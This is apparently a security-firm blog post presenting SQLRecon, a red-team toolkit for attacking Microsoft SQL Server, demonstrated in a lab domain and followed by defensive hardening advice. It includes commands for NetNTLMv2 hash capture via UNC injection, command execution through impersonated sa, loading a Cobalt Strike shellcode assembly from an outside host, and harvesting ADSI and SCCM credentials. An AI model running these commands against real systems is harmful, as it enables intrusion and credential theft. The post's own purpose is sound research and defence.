Over the course of my career, I’ve had the privileged opportunity to peek behind the veil of some of the largest organizations in the world. In my experience, most industry verticals rely on enterprise Windows networks. In fact, I can count on one hand the number of times I have seen a decentralized zero-trust network, enterprise Linux, macOS network, or Active Directory alternative (FreeIPA).

As I navigate my way through these large and often complex enterprise networks, it is common to discover Microsoft SQL Servers, which have typically been deployed to support a business function. For readers who are unfamiliar with SQL Server, the long and short is that it’s a relational database software usually installed on top of a Windows server. The primary purpose of SQL Server is to store and provide data to applications or users.

This blog post will review the attack surface that is presented by SQL Server, and how to abuse misconfigurations and vulnerabilities using X-Force Red’s tool SQLRecon. In addition, defensive considerations will be outlined where applicable.

Microsoft SQL Server

The vulnerabilities and misconfigurations in SQL Server have been well documented. While these weaknesses have seemingly always existed, somehow hardening SQL Server continues to be often overlooked by defensive teams. I am mostly referring to hardening the underlying configuration and preventing trivial access to the service.

One plausible justification for this oversight is that there are bigger risks an organization needs to prioritize and address. As a result, hardening SQL Server falls to the wayside, as tinkering with production database configurations may result in availability issues, which could manifest into operational issues and ultimately impact business productivity.

Common vulnerabilities and misconfigurations

One of the most common misconfigurations I continue to see in enterprise networks is the ability for any authenticated domain object to connect to the SQL service as a low privilege account. This only requires a valid domain context. In other words, a valid token for a domain user or domain computer account.

To illustrate an example, if the workstation of a regular business user is compromised and a network route exists to a misconfigured SQL Server, it is possible for an adversary to:

  • Execute limited SQL commands on the remote SQL Server.
  • Determine the privileges they have, which could provide escalation opportunities via impersonation-style attacks.
  • Instruct SQL Server to provide authentication materials via a solicited request to a Universal Naming Convention (UNC) path, which can result in obtaining hashed credentials, which in turn can be cracked or passed forward to perform relaying style attacks.
  • Piggyback off the rights assigned to a SQL Server that is linked to other SQL Servers, which can result in privilege escalation.

These are just some examples of what an adversary can achieve when assessing a misconfigured SQL Server within a domain context. The attack surface presented by SQL Server will always depend on the environment and configuration you are facing.

Why focus on Microsoft SQL Server attacks now?

In recent times, red team operators have been nothing short of blessed by the variety of Active Directory abuses that can be leveraged to elevate privileges in enterprise Microsoft networks. However, as defensive teams start to get a handle on mitigating these weaknesses, naturally the avenues to escalate privileges through abusing Active Directory tend to dry up.

Still, we soldier on and make our way down the proverbial list of attacks, optimistically seeking escalation paths that will aid us in acting on our objectives. I’m somewhat reluctant to admit that for a long time, attacking SQL Server was quite far down the list for me. Instead, I opted to prioritize things like shared storage spaces, internal web applications, DevOps tooling, or cloud infrastructure. You can probably see where I am going with this …

At some point in 2022, I was on an engagement and had reached a stalling point after exhausting all the preferred escalation paths. This was largely due to an exceptionally well-hardened environment. At least, that was what I thought before I discovered a large SQL Server farm, where there just had to be a misconfiguration or vulnerability.

Unbeknownst to me at the time, and only after writing this blog post, I discovered that Kaspersky found that reoccurring attacks using SQL Server had risen by 56% in 2022. That is a staggering amount.

Attacking Microsoft SQL Server

As a red team operator, I often interact with systems I have compromised in our clients’ networks using a command and control (C2) framework. The clients we are fortunate enough to work with usually have mature cyber-security programs, capable defensive teams, and modern security controls, such as endpoint detection and response (EDR) solutions.

There have been several tools developed over the years to attack SQL Server. The one that I always ended up reaching for during my pen-testing days was PowerUpSQL. This is a project that was created by Scott Sutherland (@_nullbind), developed largely in PowerShell.

EDR solutions can be a formidable opponent to go up against as they do a fantastic job detecting malicious open-source tooling designed for offensive security, especially those that rely on PowerShell. That’s not to slight PowerShell post-exploitation tooling, they serve a purpose, just not for the problem I was facing in the environment I was in.

PowerShell is good, but C# is better

The problem I was facing on my engagement was that I needed to find a way to connect to Microsoft SQL Servers and begin interrogating them to determine if there were any misconfigurations or vulnerabilities. However, using any of the existing SQL Server post-exploitation tools, which rely on PowerShell, would have been a sure-fire way of getting caught by the defensive team. This is due to a variety of reasons, which I won’t pour over in detail, but PowerShell is not an ideal harness to sling your post-exploitation attacks due to security features such as AMSI, constrained language mode, and various styles of logging. This is only further compounded when an EDR solution, and other logging and monitoring controls are in place.

As an alternative, red team operators often choose C# as a language to develop post-exploitation tooling with, as it provides an easy way to interface with the .NET framework along with Windows APIs.

By no means am I a C# or .NET developer, but I know just about enough to write tools that solve a problem I am facing. Queue SQLRecon, a C# SQL toolkit designed for offensive reconnaissance and post-exploitation.

SQLRecon

SQLRecon helps address the post-exploitation tooling gap by modernizing the approach red team operators can take when attacking SQL Servers. The tool was designed to be modular, allowing for ease of extensibility. SQLRecon is compatible stand-alone or within a diverse set of C2 frameworks. When using the latter, SQLRecon can be executed either in-process or through traditional fork and run.

SQLRecon has over 80 modules to choose from. Listed below is a high-level overview of some of the features provided by SQLRecon:

Authentication Providers

  • Local SQL database account
  • Windows domain authentication based on current token
  • Windows domain authentication with user supplied credentials
  • Azure domain authentication
  • Azure local authentication

Enumeration Modules

  • Locate SQL Servers associated with a Service Principal Name (SPN)
  • Obtain information about the SQL service
  • Determine privileges within SQL Server
  • List databases, tables, columns, and users
  • Search databases for content
  • Execute arbitrary queries
  • Enumerate users which can be impersonated
  • Identify linked SQL Servers

Command Execution, Lateral Movement and Privilege Escalation

  • xp_cmdshell
  • OLE Automation Procedures
  • Load and execute custom .NET CLR assemblies
  • SQL Agent Jobs
  • ADSI credential gathering

Operational Security

  • Continuous authentication validation
  • Extensive command line logging
  • Execution guardrails based on whether SQL Server options are enabled or disabled
  • Argument error handling
  • Randomized alphanumeric SQL content creation where applicable
  • Automatic clean-up of data created in SQL Server for command execution purposes

Other

  • Ability to switch database contexts
  • Connect to SQL Servers listening on non-standard TCP ports
  • Support for impersonation-style attacks
  • Ability to enumerate and attack linked SQL Servers
  • Support for a variety of Microsoft System Center Configuration Manager (SCCM) and Microsoft Endpoint Configuration Manager (ECM) SQL database attacks
  • All SQL queries use the System.Data.SqlClient namespace, developed by Microsoft

For detailed usage information on each technique, please refer to the wiki.

Using SQLRecon

To set the stage for the upcoming demonstrations, I will be operating off a compromised Windows 10 workstation that belongs to Jeff Smith (JSmith) in the kawalabs.local enterprise network.

Jeff’s workstation has a network route to three SQL Servers, each of which are running different versions; 2016, 2019 and 2022.

A SQL link has been configured between SQL01 and SQL02, and another SQL link has been configured between SQL02 and SQL03. For readers who are not familiar with linked SQL Servers, this effectively allows one SQL instance to execute SQL statements on another SQL instance. For example, SQL01 can execute SQL statements on SQL02, and SQL02 can execute statements on SQL03, but SQL01 cannot execute statements on SQL03 and vice versa. It is common to see linked SQL Servers in real enterprise networks.

In addition, an Active Directory Services (ADSI) link exists between SQL03 and the primary domain controller in the kawalabs.local domain, DC01. ADSI links provide SQL Server with a way to interact with Active Directory objects.

Lastly, the kawalabs.local domain has been connected to an Azure Active Directory domain, kawalabs.onmicrosoft.com using Azure AD Connect. This allows on-premise Active Directory users in the kawalabs.local to access resources in the Azure cloud. The  kawalabs.onmicrosoft.com Azure AD tenancy contains a SQL Server which stores payment data, ECOM01.

Figure 1: Network configuration

Furthermore, I will be leveraging Cobalt Strike, which is a popular command-and-control framework, to perform post-exploitation tasks from Jeff’s compromised workstation (DESKTOP-LF8Q3C6). In the following screenshot, I have executed the whoami command. This is just to display that Jeff is not a privileged user and has basic rights within the kawalabs.local domain and broader network.

Figure 2: Issuing the whoami command

Enumeration

At the time of writing, SQLRecon has two enumeration modules that can be used to discover SQL Servers in a network, as well as gain some information about a SQL Server instance. The following command will enumerate Active Directory Service Principal Names (SPNs) and identify if there are any SPNs set for SQL Servers. In the kawalabs.local domain, there is an SPN set for a couple of different accounts, this is demonstrated in the screenshot below.

SQLRecon.exe /e:SqlSpns /d:kawalabs.local

Scroll to view full table

Figure 3: Discovering SQL Servers via SPN collection

The info module is quite useful to gain additional information about a server. The example below demonstrates the type of information that is retrieved from a SQL Server.

SQLRecon.exe /a:WinToken /h:SQL02 /m:info

Scroll to view full table

Figure 4: Obtaining information about SQL02

Shout out to Daniel Duggan (@_RastaMouse) for his contributions to the enumeration modules in SQLRecon.

Standard modules

Standard modules are executed against a single instance of SQL Server.

In the following example, I use the AzureAD authentication provider, which uses the username and password for an Azure Active Directory account to authenticate against ECOM01, a SQL instance located in the Azure cloud. I then use the whoami module to determine the privileges Jeff has on ECOM01.

SQLRecon.exe /a:AzureAD /d:kawalabs.onmicrosoft.com /u:jsmith /p:XXXX /h:ecom01.database.windows.net /m:whoami

Scroll to view full table

Figure 5: Enumerating SQL privileges for [email protected]

By default, SQLRecon will connect to the master database, as this database typically exists on all SQL Server instances. However, you can easily list all the different databases on the SQL Server instances by using the databases module.

SQLRecon.exe /a:AzureAD /d:kawalabs.onmicrosoft.com /u:jsmith /p:XXXX /h:ecom01.database.windows.net /m:databases

Scroll to view full table

Figure 6: Enumerating databases on ECOM01

You can connect to other databases by specifying the database name with the /database: flag and pass forward any module you want to execute. In the example below, I connect to the Payments database on ECOM01 and execute a custom SQL query that will obtain all content from the cc table.

SQLRecon.exe /a:AzureAD /d:kawalabs.onmicrosoft.com /database:Payments /u:jsmith /p:XXXX /h:ecom01.database.windows.net /m:query /c:"select * from cc;"

Scroll to view full table

Figure 7: Obtaining dummy card data from the cc table in the Payments database on ECOM01

Moving into some more interesting modules, SQLRecon supports UNC path injection, which can be performed by a low privilege user account, such as KAWALABS\JSmith. This can result in obtaining hashed credentials, which in turn can be cracked or passed forward to perform relaying style attacks. In the following example, I use the WinToken authentication provider, which uses the token for the KAWALABS\JSmith user account, to authenticate against SQL02, an on-premise server.

SQLRecon.exe /a:WinToken /h:SQL02 /m:smb /rhost:\\172.16.10.19\Projects

Scroll to view full table

Figure 8: UNC path injection

In the following screenshot, we can see the connection being made by SQL02 to a host in our control (172.16.10.19). This results in obtaining the NetNTLMv2 hash for the KAWALABS\mssql_svc domain account.

Figure 9: Obtaining the NetNTLMv2 hash for KAWALABS\mssql_svc

SQLRecon has a variety of command execution modules that can be used to execute arbitrary commands on the underlying system. This is particularly useful if you are seeking to perform privilege escalation and/or lateral movement. Significant guardrails have been implemented throughout SQLRecon to ensure that operational security is enabled by default. The two primary guardrails are:

  • Continuous authentication validation, where SQLRecon will validate that it is possible to authenticate against the domain, or SQL Server before executing any modules.
  • Execution guardrails, where SQLRecon will validate that optimal conditions exist before executing any modules that load objects, create objects, or execute commands.

xp_cmdshell has long been one of the most common methods where commands can be executed on the underlying server via a SQL database. In the following example, I used the low privilege KAWALABS\JSmith account to attempt to launch the notepad.exe application on SQL01.

SQLRecon.exe /a:WinToken /h:SQL01 /m:xpCmd /c:notepad.exe

Scroll to view full table

Figure 10: Demonstration of guardrail preventing command execution from taking place

As seen in the image above, an execution guardrail is encountered, and an error message is received which indicates that xp_cmdshell is disabled. This is usually the default configuration on most versions of SQL Server. The nice thing is, SQLRecon has an enableXp module, which will enable the xp_cmdshell configuration. SQLRecon also has a disableXp module so that you can revert to the original secure state after executing your command with xpCmd.

SQLRecon.exe /a:WinToken /h:SQL01 /m:enableXp

Scroll to view full table

Figure 11: Demonstration of another guardrail, where insufficient privileges prevents command execution from taking place

As expected, the low privilege KAWALABS\JSmith account encounters an execution guardrail and received a message that they do not have the necessary privileges to enable or disable xp_cmdshell … or do they?

Abusing impersonation

SQL impersonation is a special permission that essentially enables a user or group to operate with the permission of another user, as well as with their own permissions. The following screenshot is taken from the backend configuration of SQL02 and demonstrates that BUILTIN\Users can impersonate the sa account.

Figure 12: BUILTIN\Users can impersonate the sa account on SQL02

SQLRecon has an impersonate module to help determine if a user account can impersonate another user.

SQLRecon.exe /a:WinToken /h:SQL02 /m:impersonate

Scroll to view full table

As seen in the screenshot below, the KAWALABS\JSmith low privilege user account can impersonate the sa account on SQL02. This demonstrates the ability to execute commands on the SQL instance with admin-like privileges. Furthermore, it means that we can now execute system commands on the underlying server.

Figure 13: Enumerating accounts that can be impersonated on SQL02

To demonstrate another command execution module, SQLRecon can execute commands on the underlying user using OLE Automation Procedures. This uses the odsole70.dll assembly to interact with COM objects so that wscript.shell can be leveraged to run arbitrary system commands.

Impersonation modules are always prepended with the letter i, and these modules will need the name of the account which is going to be impersonated. In the following example, I connect to SQL02 as the low privilege KAWALABS\JSmith account and impersonate the sa account to enable OLE Automation Procedures on SQL02.

SQLRecon.exe / a:WinToken /h:SQL02 /i:sa /m:iEnableOle
Scroll to view full table

Figure 14: Enabling OLE Automation Procedures using impersonation

Now that OLE Automation Procedures is enabled on SQL02, I am in the position to execute any arbitrary command on the underlying server in context of the user account which has started the SQL Server process. In the following example, I execute a PowerShell child process that lists the directory of the same share that was previously used to capture NetNTLMv2 credentials. Keep in mind, this is largely for demonstration purposes and not typically an action that would be performed on an adversary simulation engagement.

SQLRecon.exe /a:WinToken /h:SQL02 /i:sa /m:iOleCmd /c:"powershell.exe ls \\172.16.10.19\Projects"

Scroll to view full table

Figure 15: Using PowerShell to list a directory on a remote host

As seen in the screenshot above, a randomly generated OLE object and method gets created, the malicious command is then executed, and the OLE objects are destroyed. This is intentional as we don’t want to leave behind any evidence of our actions.

In the following screenshot, we can see the connection being made by the KAWALABS\mssql_svc user account via SQL02 to a host in our control (172.16.10.19). This results in obtaining the NetNTLMv2 hash for the KAWALABS \mssql_svc computer account.

Figure 16: Obtaining the NetNTLMv2 hash for KAWALABS\mssql_svc

The following example demonstrates using impersonation to execute the tasklist command using xp_cmdshell on SQL02.

SQLRecon.exe /a:WinToken /h:SQL02 /i:sa /m:iEnableXp

 

SQLRecon.exe /a:WinToken /h:SQL02 /i:sa /m:iXpCmd /c:tasklist

Scroll to view full table

Figure 17: Enabling xp_cmdshell and executing system commands using impersonation on SQL02

It is always good practice to revert configurations back to the state they were originally in.

SQLRecon.exe /a:WinToken /h:SQL02 /i:sa /m:iDisableOle

 

SQLRecon.exe /a:WinToken /h:SQL02 /i:sa /m:iDisableXp

Scroll to view full table

Figure 18: Disabling OLE Automation Procedures and xp_cmdshell on SQL02

Attacking linked SQL Servers

SQLRecon also can perform attacks against linked SQL Server instances. The following screenshot is taken from the backend configuration of SQL02 and demonstrates that SQL02 has a link to SQL03. From my experience, this is a common configuration in large enterprise networks.

Figure 19: SQL02 has a SQL link to SQL03

Configuring a link from one SQL Server instance to another often requires a set of privileged credentials to establish and bind the link. This is beneficial for adversaries as it allows commands to be executed on the linked SQL Server in context of the account which has established the connection. Another point of consideration is that linked servers may be segmented from the network that an adversary is operating on. This could present the opportunity to traverse segmentation boundaries and enter a network zone of higher security requirements.

SQLRecon has a links module to determine if a SQL Server has any linked SQL instances.

SQLRecon.exe /a:WinToken /h:SQL02 /m:links

Scroll to view full table

Figure 20: Enumerating linked SQL servers on SQL02

Linked modules are always prepended with the letter l, and these modules will need the name of a linked server that you want to issue commands against. In the following example, I connect to SQL02 as the low privilege KAWALABS\JSmith account and issue the lWhoami command against the linked SQL03 instance.

SQLRecon.exe /a:WinToken /h:SQL02 /l:SQL03 /m:lWhoami

Scroll to view full table

Figure 21: Enumerating SQL privileges that we can assume on SQL03 via SQL02

As seen in the screenshot above, we are operating in context of the sa account on SQL03. This is because the sa account was used to establish the SQL link from SQL02 to SQL03.

All execution modules in SQLRecon are fully supported on linked SQL Servers. In the following example, I enable Common Language Runtime (CLR) integration on SQL02.

SQLRecon.exe /a:WinToken /h:SQL02 /l:SQL03 /m:lEnableClr

Scroll to view full table

Figure 22: Enabling CLR integration on SQL02

CLR integration allows custom .NET assembles to be imported into SQL Server. These assemblies are stored inside of a stored procedure before they get executed. This is a nice lateral movement attack primitive.

In the following screenshot, I create a custom SQL Server CLR compatible .NET assembly called hollow.dll.  This will store a Cobalt Strike payload into a stored procedure named ExecuteShellcode. The payload performs basic process hollowing and injects the Cobalt Strike shellcode into newly spawned Internet Explorer (iexplore.exe) process.

Figure 23: hollow.dll, a SQL Server CLR compatible .NET assembly

If you are interested in learning more about custom SQL Server CLR compatible .NET assemblies, please visit the Clr section of the SQLRecon wiki. An example of hollow.dll can be found here.

In the following demonstration, I have uploaded hollow.dll to a web server and renamed the assembly to favicon.png. I instruct the linked SQL03 server to download favicon.png from a web server and perform the necessary steps to import the custom assembly into a SQL Server stored procedure and execute the payload. This results in obtaining a Cobalt Strike beacon in context of the KAWALABS\mssql_svc user on SQL03.

SQLRecon.exe /a:WinToken /h:SQL02 /l:SQL03 /m:lClr /dll:https://cdn.popped.io/favicon.png /function:ExecuteShellcode

Scroll to view full table

Figure 24: Obtaining a Cobalt Strike beacon in context of KAWALABS\mssql_svc on SQL03

Of course, the previous example requires that SQL03 has Internet access for the assembly to be downloaded from a public-facing web server. There are cases where downloading a foreign resource from a public-facing web server is not possible or desirable. As such, SQLRecon allows custom assemblies to be loaded directly from the file system of the compromised host, or from an SMB share. In the following demonstration, I have uploaded hollow.dll to a local SMB server and renamed the assembly to Reports.xlsx. I instruct the linked SQL03 server to download Reports.xlsx from the SMB server and perform the necessary steps to import the custom assembly into a SQL Server stored procedure and execute the payload. This results in obtaining a Cobalt Strike beacon in context of the KAWALABS\mssql_svc user on SQL03.

SQLRecon.exe /a:WinToken /h:SQL02 /l:SQL03 /m:lClr /dll:\\172.16.10.19\Projects\Reports.xlsx /function:ExecuteShellcode

Scroll to view full table

Figure 25: Obtaining a Cobalt Strike beacon in context of KAWALABS\mssql_svc<code> on <code>SQL03

Attacking linked SQL Servers – ADSI abuse

SQLRecon also can perform attacks against linked ADSI Server instances to obtain cleartext credentials for domain accounts. For additional information on ADSI tradecraft, please see the Tarlogic blog post. The following screenshot is taken from the backend configuration SQL03 and demonstrates that SQL03 has an ADSI link to the primary domain controller in the kawalabs.local domain, DC01. This ADSI link is represented by the linkADSI object.

Figure 26: SQL03 has an ADSI link to DC01

Configuring an ADSI link from an instance of SQL Server to an Active Directory domain controller does not necessarily require privileged credentials. However, during real-world operations, I have seen cases where the principle of least privilege has not been applied.

In the following example, I use the lLinks module to first connect to SQL02, and then query SQL03 for additional linked SQL Server. You can think of this as a double link scenario.

SQLRecon.exe /a:WinToken /h:SQL02 /l:SQL03 /m:lLinks

Scroll to view full table

Figure 27: Enumerating links on SQL03 from SQL02

Now that we have verified that an ADSI link exists on SQL03, we can leverage the lAdsi module to obtain the cleartext domain credentials used to configure the ADSI connection from SQL03 to DC01. This involves uploading a custom CLR assembly that contains an LDAP server into a new SQL Server runtime routine on SQL03. The LDAP server will then execute and listen for local-only connections on a user supplied port, in this case 49103. We then leverage SQL Server agent jobs on SQL03 to direct the credentials used to configure the ADSI connection to solicit an LDAP request to the local LDAP server on port 49103. This temporary LDAP authentication redirection is what ultimately results in obtaining cleartext domain credentials. It should be noted that the Adsi and iAdsi modules do not use SQL Server agent jobs to initiate the LDAP solicitation process, instead, standard SQL queries are used.

SQLRecon.exe /a:WinToken /h:SQL02 /l:SQL03 /m:lAdsi /rhost:linkADSI /lport:49103

Scroll to view full table

Figure 28: Double-link ADSI credential gathering attack

SCCM modules

One of the biggest extensions to SQLRecon comes from my colleague Dave Cossa (@G0ldenGunSec), who has introduced a variety of modules that can be leveraged to abuse Microsoft System Center Configuration Manager (SCCM) and Microsoft Endpoint Configuration Manager (ECM). SCCM modules were developed off the back of a real-world engagement, where abusing the SCCM SQL Server database facilitated with furthering our progress to objectives. In most cases, to interact with the SCCM database, an elevated privilege context needs to be acquired, or access to the SCCM server needs to be obtained. In the examples below, I have a Cobalt Strike beacon running in context of the KAWALABS\mssccm_svc account on an ECM server, MECM01.

I’ll simply refer to both ECM and SCCM as SCCM from this point onwards.

In the following example, I use the databases module to enumerate the databases which exist in the SQL Server instance on MECM01.

SQLRecon.exe /a:WinToken /h:MECM01 /m:databases

Scroll to view full table

Figure 29: Enumerating databases on MECM01

As seen in the screenshot above, the CM_KAW database exists, which is most likely database configured for SCCM on this server.

SCCM modules are always prepended with the letter s, and these modules will need the name of the SCCM database that you want to issue commands against. In the following example, I connect to the CM_KAW database on MECM01 as the KAWALABS\mssccm_svc account and issue the sUsers command. This module enumerates all principals that are configured to logon to the SCCM server.

SQLRecon.exe /a:WinToken /h:MECM01 /database:CM_KAW /m:sUsers

Scroll to view full table

Figure 30: Enumerating all users that can log in to SCCM via the SCCM SQL Server database

It is also possible to enumerate tasks that have been configured in SCCM by using the sTaskList module.

SQLRecon.exe /a:WinToken /h:MECM01 /database:CM_KAW /m:sTaskList

Scroll to view full table

Figure 31: Enumerating tasks configured in SCCM via the SCCM SQL Server database

SCCM will usually need to vault credentials, which are used to authenticate to systems or resources in an environment to deploy software packages or perform any of the other various actions provided by SCCM. Using the sCredentials module, we can obtain a list of vaulted credentials.

SQLRecon.exe /a:WinToken /h:MECM01 /database:CM_KAW /m:sCredentials

Scroll to view full table

Figure 32: Obtaining vaulted credentials via the SCCM SQL Server database

In the screenshot above, we can see that one credential has been vaulted, and this is the credential for the KAWALABS\mssccm_svc account.

Using Adam Chester’s (@_xpn_) logic, it is possible to decrypt SCCM vaulted credentials and obtain the cleartext password for vaulted accounts. This does require local administrator privileges on the SCCM server. In the following screenshot, I use the sDecryptCredentials account to decrypt the credential vaulted for the KAWALABS\mssccm_svc account.

SQLRecon.exe /a:WinToken /h:MECM01 /database:CM_KAW /m:sDecryptCredentials

Scroll to view full table

Figure 33: Decrypting vaulted SCCM credentials

Defensive considerations

To prevent attackers from abusing SQL Server, defenders can take a layered approach when implementing security controls. First and foremost, I would highly suggest reading the official Microsoft guidance on SQL Server security best practices.

The next stop should be the prevention, detection, and mitigation guidance in the SQLRecon wiki, which has some excellent defensive considerations. I’ve picked out a couple of the more important controls to implement and listed them below.

Network security controls

The following security controls should be considered for implementation at the network level.

  • Ensure that network routes to SQL Servers have been accounted for and limited to only an authorized set of systems, or subnets. Workstations rarely require the ability to communicate directly with SQL Servers. Consider blocking access to TCP 1433 if viable.
  • Verify that network logging and monitoring tools are capturing SQL queries which traverse network boundaries. It would be unusual for a workstation to send SQL queries to a SQL server.

Endpoint security controls

The following security controls should be considered for implementation on workstations and servers in the environment.

  • Validate that host-based security controls, such as endpoint detection and response solutions are enabled and that product signatures are fully up to date on a regular basis.
  • Defenders should ensure that .NET Framework v4.8 is installed on Windows endpoints and that whatever host-based security product is being used supports AMSI for .NET. This allows the scanning of .NET assemblies in memory.
  • Enable or configure an application allow-listing solution to prevent unsigned binaries, such as SQLRecon, from being executed directly on the endpoint.

Microsoft SQL Server security controls

  • Ensure that hardening guidelines have been followed on the underlying Windows Server operating system. Consider only installing the necessary SQL database components.
  • Ensure that SQL Servers are encompassed in the organizations patch management policy and that patches are routinely applied against the SQL service and SQL server.
  • Consider restricting or remove the BUILTIN\Users account from authenticating against SQL Server instances.
  • Follow the principle of least privilege when configuring roles on user accounts. This principle should also be applied to the service account which starts SQL Server.
  • Remove unnecessary SQL service principal name associations.
  • Use strong passwords for any local account, such as the sa account.
  • Log, centrally ingest and audit SQL Server logon events. Netwrix has written a great blog on how this can be achieved.
  • Encrypt sensitive content. This protects datasets from being exposed, even if the SQL Server is compromised.
  • Evaluate links between SQL servers and determine the type of authentication binding the link. If possible, elect to use the current authentication security context, rather than using the context of the sa account.
  • Evaluate any impersonations which have been configured and determine their requirements.
  • If using Azure SQL databases, ensure that Microsoft Advanced Threat Protection is enabled and configured to send alerts.

Conclusion

Attacks against SQL Server continue to be relevant in today’s cybersecurity landscape. Adversaries are constantly evolving their techniques to evade defensive controls, and in doing so, they are increasingly exploiting ancillary services, such as SQL Server. These attacks have become more sophisticated and stealthier, often employing less common techniques to bypass traditional security measures.

By abusing SQL Server, adversaries can gain unauthorized access to sensitive data, manipulate databases, and even compromise entire systems. The consequences of such attacks can be severe, resulting in data breaches, financial losses, and damage to an organization’s reputation.

To mitigate the risk of these attacks, it is crucial for organizations to review their SQL Server configurations and adopt best practices for security. Moreover, organizations should invest in security solutions that provide real-time monitoring, anomaly detection, and behavioral analysis capabilities. These solutions can help detect and respond to attacks more effectively, minimizing the potential impact on critical data and systems. By taking proactive measures to secure SQL Server environments, organizations can significantly reduce the risk of falling victim to these attacks and protect their valuable data assets.

You can always find the latest stable version of SQLRecon on the X-Force Red Github page.

If you’re attending Black Hat Las Vegas and are interested in learning more you can attend my session: Abusing Microsoft SQL Server with SQLRecon on Thursday, August 10 at 1:00 pm PT.

More from Adversary Services

Exploiting GOG Galaxy XPC service for privilege escalation in macOS

7 min read - Being part of the Adversary Services team at IBM, it is important to keep your skills up to date and learn new things constantly. macOS security was one field where I decided to put more effort this year to further improve my exploitation and operation skills in macOS environments. During my research, I decided to try and discover vulnerabilities in software that I had pre-installed on my laptop, which resulted in the discovery of this vulnerability. In this article, I…

Extending and automating NightHawk with DayBird

13 min read - NightHawk, MDSec’s commercial C2 product, has focused on operational security and detection avoidance since its initial release in December 2021. While the core functionality of the framework has been effective within the scope of these objectives, our team noticed certain features were missing as we started incorporating NightHawk into our engagements alongside our other C2 options. Most notably, there was no equivalent in NightHawk to Cobalt Strike’s Aggressor scripting platform, severely limiting automation capabilities. While I know how big of…

Critically close to zero(day): Exploiting Microsoft Kernel streaming service

10 min read - Last month Microsoft patched a vulnerability in the Microsoft Kernel Streaming Server, a Windows kernel component used in the virtualization and sharing of camera devices. The vulnerability, CVE-2023-36802, allows a local attacker to escalate privileges to SYSTEM. This blog post details my process of exploring a new attack surface in the Windows kernel, finding a 0-day vulnerability, exploring an interesting bug class, and building a stable exploit. This post doesn’t require any specialized Windows kernel knowledge to follow along, though…

Topic updates

Get email updates and stay ahead of the latest threats to the security landscape, thought leadership and research.
Subscribe today